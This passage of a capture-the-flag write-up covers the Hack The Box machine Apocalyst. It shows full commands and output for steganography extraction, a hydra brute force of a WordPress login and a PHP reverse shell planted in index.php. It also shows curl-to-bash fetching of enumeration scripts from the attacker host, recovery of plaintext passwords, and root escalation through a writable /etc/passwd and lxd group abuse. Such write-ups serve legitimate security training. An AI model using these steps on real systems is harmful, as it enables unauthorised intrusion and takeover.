157B - /Old/ [07:49:52] 200 - 157B - /name/ [07:49:52] 200 - 157B - /make/ [07:49:52] 200 - 157B - /given/ [07:49:52] 200 - 157B - /branding/ [07:49:52] 200 - 157B - /fulfilled/ [07:49:52] 200 - 157B - /build/ [07:49:52] 200 - 157B - /needs/ [07:49:52] 200 - 157B - /pictures/ [07:49:52] 200 - 157B - /long/ [07:49:52] 200 - 157B - /Orthodox/ [07:49:52] 200 - 157B - /bowl/ [07:49:52] 200 - 157B - /end/ [07:49:52] 200 - 157B - /describe/ [07:49:52] 200 - 157B - /either/ [07:49:52] 200 - 157B - /generally/ [07:49:52] 200 - 157B - /must/ [07:49:52] 200 - 157B - /half/ [07:49:52] 200 - 157B - /suffering/
Task Completed

Again, there are a bunch of folders, but the folder Rightiousness has a different size.

Apocalyst04.png

u505@kali:~/HTB/Machines/Apocalyst$ curl http://apocalyst.htb/Rightiousness/
<!doctype html>
 <br>
 <html lang="en">
 <head>
   <meta charset="utf-8">
 <br>
   <title>End of the world</title>
 </head>
 <br>
 <body>
   <img src="image.jpg">
  <!-- needle -->
 </body>
 </html>
u505@kali:~/HTB/Machines/Apocalyst$ wget http://apocalyst.htb/Rightiousness/image.jpg
--2020-05-12 07:51:40--  http://apocalyst.htb/Rightiousness/image.jpg
Resolving apocalyst.htb (apocalyst.htb)... 10.10.10.46
Connecting to apocalyst.htb (apocalyst.htb)|10.10.10.46|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 215541 (210K) [image/jpeg]
Saving to: ‘image.jpg.1’

image.jpg.1 100%[===================>] 210.49K 1.17MB/s in 0.2s
2020-05-12 07:51:40 (1.17 MB/s) - ‘image.jpg.1’ saved [215541/215541]
u505@kali:~/HTB/Machines/Apocalyst$ steghide info image.jpg.1
"image.jpg.1":
  format: jpeg
  capacity: 13.0 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
  embedded file "list.txt":
    size: 3.6 KB
    encrypted: rijndael-128, cbc
    compressed: yes

This time the downloaded image has hidden data.

u505@kali:~/HTB/Machines/Apocalyst$ steghide extract -sf image.jpg.1
Enter passphrase:
wrote extracted data to "list.txt".

Brute force wordpress admin login

Apocalyst05.png Apocalyst06.png

We try a login with the user falaraki to intercept the HTTP request.

POST /wp-login.php HTTP/1.1
Host: apocalyst.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://apocalyst.htb/wp-login.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 108
Connection: close
Cookie: wordpress_test_cookie=WP+Cookie+check
Upgrade-Insecure-Requests: 1

log=falaraki&pwd=password&wp-submit=Log+In&redirect_to=http%3A%2F%2Fapocalyst.htb%2Fwp-admin%2F&testcookie=1

Apocalyst07.png

We intercept the response to intercept the error message.

The password you entered for the username <strong>falaraki</strong> is incorrect.

With this information, hydra will brute force the login page.

u505@kali:~/HTB/Machines/Apocalyst$ hydra -l falaraki -P list.txt "http-post-form://apocalyst.htb/wp-login.php:log=falaraki&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Fapocalyst.htb%2Fwp-admin%2F&testcookie=1:The password you entered for the username <strong>falaraki</strong> is incorrect."
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-05-12 15:26:27 [DATA] max 16 tasks per 1 server, overall 16 tasks, 486 login tries (l:1/p:486), ~31 tries per task [DATA] attacking http-post-form://apocalyst.htb:80/wp-login.php:log=falaraki&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Fapocalyst.htb%2Fwp-admin%2F&testcookie=1:The password you entered for the username <strong>falaraki</strong> is incorrect. [80][http-post-form] host: apocalyst.htb login: falaraki password: Transclisiation 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-05-12 15:26:55

Hydra finds the password from the list and we gain access to the admin portal.

Apocalyst08.png

Reverse shell

u505@kali:~/HTB/Machines/Apocalyst$ cp /usr/share/webshells/php/php-reverse-shell.php ./

We prepare our reverse shell script.

u505@kali:~/HTB/Machines/Apocalyst$ grep CHANGE php-reverse-shell.php
$ip = '10.10.14.28';  // CHANGE THIS
$port = 4444;       // CHANGE THIS

We turn on the listener.

u505@kali:~/HTB/Machines/Apocalyst$ rlwrap nc -lnvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444

We inject our reverse shell php code in the index.php page.

Apocalyst09.png

u505@kali:~/HTB/Machines/Apocalyst$ curl http://apocalyst.htb/

The call at the main page triggers the reverse shell.

u505@kali:~/HTB/Machines/Apocalyst$ rlwrap nc -lnvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.46.
Ncat: Connection from 10.10.10.46:39290.
Linux apocalyst 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 20:55:09 up 31 min,  0 users,  load average: 0.00, 0.00, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c "import pty;pty.spawn('/bin/bash')"
/bin/sh: 1: python: not found
$ python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@apocalyst:/$ stty raw -echo
stty raw -echo

User Flag

The user flag is available from www-data.

www-data@apocalyst:/$ cat /home/falaraki/user.txt
<USER_FLAG>

Enumeration

Mysql enumeration

www-data@apocalyst:/var/www/html/apocalyst.htb$ cat wp-config.php
...
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wp_myblog');

/** MySQL database username */ define('DB_USER', 'root');
/** MySQL database password */ define('DB_PASSWORD', 'Th3SoopaD00paPa5S!');
/** MySQL hostname */ define('DB_HOST', 'localhost');
/** Database Charset to use in creating database tables. */ define('DB_CHARSET', 'utf8');
/** The Database Collate type. Don't change this if in doubt. */ define('DB_COLLATE', ); ...
www-data@apocalyst:/var/www/html/apocalyst.htb$ mysql -p -u root
Enter password: Th3SoopaD00paPa5S!

Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 804 Server version: 5.7.19-0ubuntu0.16.04.1 (Ubuntu)
Copyright (c) 2000, 2017, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its affiliates. Other names may be trademarks of their respective owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases; show databases; +--------------------+ | Database | +--------------------+ | information_schema | | mysql | | performance_schema | | sys | | wp_myblog | +--------------------+ 5 rows in set (0.01 sec) use wp_myblog; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A
Database changed

No new information is found on the database.

LinEnum as www-data

u505@kali:~/HTB/Machines/Apocalyst$ mkdir www
u505@kali:~/HTB/Machines/Apocalyst$ cd www/
u505@kali:~/HTB/Machines/Apocalyst/www$ cp /opt/utils/LinEnum/LinEnum.sh ./
u505@kali:~/HTB/Machines/Apocalyst/www$ sudo python -m SimpleHTTPServer 80
[sudo] password for u505:
Serving HTTP on 0.0.0.0 port 80 ...
www-data@apocalyst:/var/www/html/apocalyst.htb$ curl http://10.10.14.28/LinEnum.sh | bash
...
[-] It looks like we have some admin users:
uid=104(syslog) gid=108(syslog) groups=108(syslog),4(adm)
uid=1000(falaraki) gid=1000(falaraki) groups=1000(falaraki),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
...
[-] Files not owned by user but writable by group:
-rw-rw-rw- 1 root root 1681 May 12 21:40 /etc/passwd
...
[-] Accounts that have recently used sudo:
/home/falaraki/.sudo_as_admin_successful

pspy

u505@kali:~/HTB/Machines/Apocalyst/www$ cp /opt/utils/pspy/pspy64 ./
u505@kali:~/HTB/Machines/Apocalyst/www$ sudo python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
www-data@apocalyst:/tmp$ wget http://10.10.14.28/pspy64
--2020-05-12 21:13:41--  http://10.10.14.28/pspy64
Connecting to 10.10.14.28:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3078592 (2.9M) [application/octet-stream]
Saving to: 'pspy64'

pspy64 100%[===================>] 2.94M 3.87MB/s in 0.8s
2020-05-12 21:13:41 (3.87 MB/s) - 'pspy64' saved [3078592/3078592] www-data@apocalyst:/tmp$ chmod +x pspy64 www-data@apocalyst:/tmp$ ./pspy64

We don't find any cron job on the server.

Hidden user file

www-data@apocalyst:/home/falaraki$ ls -la
ls -la
total 44
drwxr-xr-x 4 falaraki falaraki 4096 Jul 27  2017 .
drwxr-xr-x 3 root     root     4096 Jul 26  2017 ..
-rw------- 1 falaraki falaraki  516 Jul 27  2017 .bash_history
-rw-r--r-- 1 falaraki falaraki  220 Jul 26  2017 .bash_logout
-rw-r--r-- 1 falaraki falaraki 3771 Jul 26  2017 .bashrc
drwx------ 2 falaraki falaraki 4096 Jul 26  2017 .cache
drwxrwxr-x 2 falaraki falaraki 4096 Jul 26  2017 .nano
-rw-r--r-- 1 falaraki falaraki  655 Jul 26  2017 .profile
-rw-rw-r-- 1 falaraki falaraki  109 Jul 26  2017 .secret
-rw-r--r-- 1 falaraki falaraki    0 Jul 26  2017 .sudo_as_admin_successful
-rw-r--r-- 1 root     root     1024 Jul 27  2017 .wp-config.php.swp
-rw-rw-r-- 1 falaraki falaraki   33 Jul 26  2017 user.txt

There is an hidden file.

www-data@apocalyst:/home/falaraki$ cat .secret
cat .secret
S2VlcCBmb3JnZXR0aW5nIHBhc3N3b3JkIHNvIHRoaXMgd2lsbCBrZWVwIGl0IHNhZmUhDQpZMHVBSU50RzM3VGlOZ1RIIXNVemVyc1A0c3M=
www-data@apocalyst:/home/falaraki$ base64 -d .secret
base64 -d .secret
Keep forgetting password so this will keep it safe!
Y0uAINtG37TiNgTH!sUzersP4ss</span|

We find falaraki password.

www-data@apocalyst:/home/falaraki$ su - falaraki
su - falaraki
Password: Y0uAINtG37TiNgTH!sUzersP4ss
falaraki@apocalyst:~$ sudo -l
sudo -l
[sudo] password for falaraki: Y0uAINtG37TiNgTH!sUzersP4ss

Sorry, user falaraki may not run sudo on apocalyst.

I expected access to sudo, because of the sudo flag. But it seems that user falaraki doesn't have sudo rights anymore.

LinEnum as falaraki

falaraki@apocalyst:~$ curl http://10.10.14.28/LinEnum.sh | bash
...
[-] Files not owned by user but writable by group:
-rw-rw-rw- 1 root root 1681 May 12 21:40 /etc/passwd
...
[-] Can we read/write sensitive files:
-rw-rw-rw- 1 root root 1681 May 12 21:40 /etc/passwd
-rw-r--r-- 1 root root 830 Jul 27  2017 /etc/group
-rw-r--r-- 1 root root 575 Oct 22  2015 /etc/profile
-rw-r----- 1 root shadow 1070 Jul 26  2017 /etc/shadow
...
[+] We're a member of the (lxd) group - could possibly misuse these rights!
uid=1000(falaraki) gid=1000(falaraki) groups=1000(falaraki),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)

Adding to the /etc/passwd writable file, we find that user falaraki is member of linux containers administrator.

Falaraki's bash_history

falaraki@apocalyst:~$ cat .bash_history
cat .bash_history
ifconfig
su root
sudo su
su root
exit
sudo su
exit
nano /etc/rc.local
car /etc/rc.local
cat /etc/rc.local
nano /etc/rc.local
ifconfig
init 6
nano /etc/rc.local
su root
cd /var/www/html/
ls
cd Rightiousness/
ls
nano index.html
ps
sudo su
su root
cd ~
ls
rm -fr setup/
ls
exit
su root
pwd
touch user.txt
nano user.txt
ls
nano .secret
ls -la
rm .secret
ls
nano .secret
su root
ls -la /etc/rc.local
su root
id
sudo nano
su root
exit
sudo -i
sudo ping google.co,
sudo su
sudo nano
exit
ls -la /etc/passwd
exit

Escalation of privileges

Change falaraki user id

We know the password of falaraki, so we can change the user id in the /etc/passwd file

falaraki@apocalyst:/tmp$ sed 's/1000/0/g' /etc/passwd > passwd
falaraki@apocalyst:/tmp$ cp passwd /etc/passwd
falaraki@apocalyst:/tmp$ id
uid=1000 gid=1000(falaraki) groups=1000(falaraki),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
falaraki@apocalyst:/tmp$ exit
logout
www-data@apocalyst:/$ su - falaraki
Password: Y0uAINtG37TiNgTH!sUzersP4ss
root@apocalyst:~# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
root@apocalyst:~# cat /root/root.txt
<ROOT_FLAG>

Alternative add new root user

The file /etc/passwd is world writable, we don't even need to know falaraki password to add a root user.

www-data@apocalyst:/$ echo "u505:`openssl passwd hello`:0:0:root:/root:/bin/bash" >> /etc/passwd
www-data@apocalyst:/$ grep u505 /etc/passwd
u505:zLlAdqns..VZI:0:0:root:/root:/bin/bash
www-data@apocalyst:/$ su - u505
Password: hello

root@apocalyst:/# id uid=0(root) gid=0(root) groups=0(root)

Alternative abuse lxd group privileges

The user falaraki is memeber of the group lxd.

u505@kali:~/HTB/Machines/Apocalyst$ searchsploit -m 46978
  Exploit: Ubuntu 18.04 - 'lxd' Privilege Escalation
      URL: https://www.exploit-db.com/exploits/46978
     Path: /usr/share/exploitdb/exploits/linux/local/46978.sh
File Type: Bourne-Again shell script, UTF-8 Unicode text executable, with CRLF line terminators

Copied to: /home/u505/HTB/Machines/Apocalyst/46978.sh u505@kali:~/HTB/Machines/Apocalyst$ dos2unix 46978.sh dos2unix: converting file 46978.sh to Unix format...

First, we download the container script creation.

u505@kali:~/HTB/Machines/Apocalyst$ wget https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine
--2020-05-13 07:33:04--  https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 199.232.0.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|199.232.0.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7498 (7.3K) [text/plain]
Saving to: ‘build-alpine’

build-alpine 100%[===================>] 7.32K --.-KB/s in 0s
2020-05-13 07:33:04 (25.0 MB/s) - ‘build-alpine’ saved [7498/7498]

Container creation.

u505@kali:~/HTB/Machines/Apocalyst$ sudo ./build-alpine
Determining the latest release... v3.11
Using static apk from http://dl-cdn.alpinelinux.org/alpine//v3.11/main/x86_64
Downloading alpine-mirrors-3.5.10-r0.apk
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
Downloading alpine-keys-2.1-r2.apk
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
Downloading apk-tools-static-2.10.5-r0.apk
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
alpine-devel@lists.alpinelinux.org-4a6a0840.rsa.pub: OK
Verified OK
Selecting mirror http://dl-3.alpinelinux.org/alpine/v3.11/main
fetch http://dl-3.alpinelinux.org/alpine/v3.11/main/x86_64/APKINDEX.tar.gz
(1/19) Installing musl (1.1.24-r2)
(2/19) Installing busybox (1.31.1-r9)
Executing busybox-1.31.1-r9.post-install
(3/19) Installing alpine-baselayout (3.2.0-r3)
Executing alpine-baselayout-3.2.0-r3.pre-install
Executing alpine-baselayout-3.2.0-r3.post-install
(4/19) Installing openrc (0.42.1-r2)
Executing openrc-0.42.1-r2.post-install
(5/19) Installing alpine-conf (3.8.3-r6)
(6/19) Installing libcrypto1.1 (1.1.1g-r0)
(7/19) Installing libssl1.1 (1.1.1g-r0)
(8/19) Installing ca-certificates-cacert (20191127-r1)
(9/19) Installing libtls-standalone (2.9.1-r0)
(10/19) Installing ssl_client (1.31.1-r9)
(11/19) Installing zlib (1.2.11-r3)
(12/19) Installing apk-tools (2.10.5-r0)
(13/19) Installing busybox-suid (1.31.1-r9)
(14/19) Installing busybox-initscripts (3.2-r2)
Executing busybox-initscripts-3.2-r2.post-install
(15/19) Installing scanelf (1.2.4-r0)
(16/19) Installing musl-utils (1.1.24-r2)
(17/19) Installing libc-utils (0.7.2-r0)
(18/19) Installing alpine-keys (2.1-r2)
(19/19) Installing alpine-base (3.11.6-r0)
Executing busybox-1.31.1-r9.trigger
OK: 8 MiB in 19 packages
u505@kali:~/HTB/Machines/Apocalyst$ cp alpine.tar.tgz www/
u505@kali:~/HTB/Machines/Apocalyst$ cd www/
u505@kali:~/HTB/Machines/Apocalyst/www$ sudo python -m SimpleHTTPServer 80
[sudo] password for u505:
Serving HTTP on 0.0.0.0 port 80 ...

From the target, we download the container as falaraki.

falaraki@apocalyst:~$ id
uid=1000(falaraki) gid=1000(falaraki) groups=1000(falaraki),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
falaraki@apocalyst:~$ cd /tmp
falaraki@apocalyst:/tmp$ wget -q http://10.10.14.28/alpine.tar.tgz

Image import

falaraki@apocalyst:/tmp$ lxc image import alpine.tar.tgz --alias alpine
Image imported with fingerprint: 7decf8d82cdc1bf6d4ae96ae60b738aa392254d5c9c4fd8fef66507a5766e80a
falaraki@apocalyst:/tmp$ lxc image list
+--------+--------------+--------+-------------------------------+--------+--------+-------------------------------+
| ALIAS  | FINGERPRINT  | PUBLIC |          DESCRIPTION          |  ARCH  |  SIZE  |          UPLOAD DATE          |
+--------+--------------+--------+-------------------------------+--------+--------+-------------------------------+
| alpine | 7decf8d82cdc | no     | alpine v3.11 (20200513_07:37) | x86_64 | 3.08MB | May 13, 2020 at 11:55am (UTC) |
+--------+--------------+--------+-------------------------------+--------+--------+-------------------------------+

Container creation from image

falaraki@apocalyst:/tmp$ lxc init alpine privesc -c security.privileged=true
Creating privesc

Container configuration mapping host root folder.

falaraki@apocalyst:/tmp$ lxc config device add privesc giveMeRoot disk source=/ path=/mnt/root recursive=true
Device giveMeRoot added to privesc

We start the container

falaraki@apocalyst:/tmp$ lxc start privesc
~ # df -h
df -h
Filesystem                Size      Used Available Use% Mounted on
/dev/mapper/apocalyst--vg-root
                          3.4G      1.9G      1.3G  59% /
none                    492.0K         0    492.0K   0% /dev
udev                    980.6M         0    980.6M   0% /dev/fuse
udev                    980.6M         0    980.6M   0% /dev/net/tun
/dev/mapper/apocalyst--vg-root
                          3.4G      1.9G      1.3G  59% /dev/lxd
/dev/mapper/apocalyst--vg-root
                          3.4G      1.9G      1.3G  59% /mnt/root
udev                    980.6M         0    980.6M   0% /mnt/root/dev
tmpfs                  1000.2M         0   1000.2M   0% /mnt/root/dev/shm
tmpfs                   200.0M      5.9M    194.1M   3% /mnt/root/run
tmpfs                     5.0M         0      5.0M   0% /mnt/root/run/lock
tmpfs                   200.0M         0    200.0M   0% /mnt/root/run/user/1000
tmpfs                  1000.2M         0   1000.2M   0% /mnt/root/sys/fs/cgroup
/dev/sda1               471.6M     56.8M    390.4M  13% /mnt/root/boot
/dev/mapper/apocalyst--vg-root
                          3.4G      1.9G      1.3G  59% /mnt/root/var/lib/lxd/shmounts
/dev/mapper/apocalyst--vg-root
                          3.4G      1.9G      1.3G  59% /dev/.lxd-mounts
tmpfs                   200.0M     36.0K    200.0M   0% /run

We have full access of the host disk as root mounted on folder /mnt/root

~ # cat /mnt/root/root/root.txt
cat /mnt/root/root/root.txt
<ROOT_FLAG>
~ # exit

Once we access the files, we stop and delete the container and image.

falaraki@apocalyst:/tmp$ lxc stop privesc
falaraki@apocalyst:/tmp$ lxc delete privesc
falaraki@apocalyst:/tmp$ lxc image delete alpine

References

Daniel Simao 15:22, 13 May 2020 (EDT)